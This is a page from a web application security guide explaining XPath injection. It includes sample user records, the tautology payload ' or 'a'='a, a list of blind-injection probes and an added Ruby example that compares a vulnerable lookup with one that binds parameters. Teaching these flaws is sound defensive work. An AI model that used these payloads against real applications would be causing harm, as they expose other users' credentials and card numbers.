Web application security - the fast guide 1.1 | Page 127

Chapter 6 - Attack execution (2)

    <firstName>Chris</firstName>
    <surname>Dawes</surname>
    <password>secret</password>
    <email>cdawes@craftnet.de</email>
    <ccard>3981 2491 3242 3121</ccard>
  </address>
  <address>
    <firstName>James</firstName>
    <surname>Hunter</surname>
    <password>letmein</password>
    <email>james.hunter@pookmail.com</email>
    <ccard>8113 5320 8014 3313</ccard>
  </address>
</addressBook>
The following XPath query effectively verifies the user-supplied credentials and retrieves the relevant user's credit card number:

//address[surname/text()='Dawes' and password/text()='secret']/ccard/text()
Attack: Using the value (' or 'a'='a) as the password will result in retrieving the credit card information of all users. If the structure of the document is not known, it is difficult to know exactly what to write; this problem is usually solved using what is called blind XPath injection:

' or substring(name(parent::*[position()=1]),2,1)='a
' or substring(name(parent::*[position()=1]),2,1)='b
' or substring(name(parent::*[position()=1]),2,1)='c
' or substring(name(parent::*[position()=1]),2,1)='d
etc.
The previous listing can be used to extract node names .
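The concatenated lookup described above beside a hardened form that binds the credentials as XPath variables, as an added Ruby example that is not part of the book: the address book is constructed from the page's sample data, and REXML's `$variable` binding stands in for whatever parameter mechanism the real application's XPath library offers.

```ruby
# Added example (not the book's code): the page's XPath lookup built by string
# concatenation, next to a version that passes user input as XPath variables.
require 'rexml/document'

# Constructed sample document, using the two entries shown on the page.
ADDRESS_BOOK = <<~XML
  <addressBook>
    <address>
      <firstName>Chris</firstName><surname>Dawes</surname>
      <password>secret</password><email>cdawes@craftnet.de</email>
      <ccard>3981 2491 3242 3121</ccard>
    </address>
    <address>
      <firstName>James</firstName><surname>Hunter</surname>
      <password>letmein</password><email>james.hunter@pookmail.com</email>
      <ccard>8113 5320 8014 3313</ccard>
    </address>
  </addressBook>
XML
DOC = REXML::Document.new(ADDRESS_BOOK)

# Vulnerable: surname and password are spliced into the expression, so a quote
# in the input ends the literal and the rest is parsed as query logic.
def ccards_vulnerable(surname, password)
  xpath = "//address[surname/text()='#{surname}' and " \
          "password/text()='#{password}']/ccard/text()"
  REXML::XPath.match(DOC, xpath).map(&:value)
end

# Hardened: the expression is a fixed string; the values travel as the XPath
# variables $s and $p and are only ever compared as data.
def ccards_safe(surname, password)
  xpath = "//address[surname/text()=$s and password/text()=$p]/ccard/text()"
  REXML::XPath.match(DOC, xpath, {}, { 's' => surname, 'p' => password })
             .map(&:value)
end

if __FILE__ == $0
  payload = "' or 'a'='a"                 # the password value from the page
  puts "legit     : #{ccards_vulnerable('Dawes', 'secret').inspect}"
  puts "vulnerable: #{ccards_vulnerable('Dawes', payload).inspect}"  # both cards
  puts "safe      : #{ccards_safe('Dawes', payload).inspect}"        # []
end
```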
6.12 LDAP injection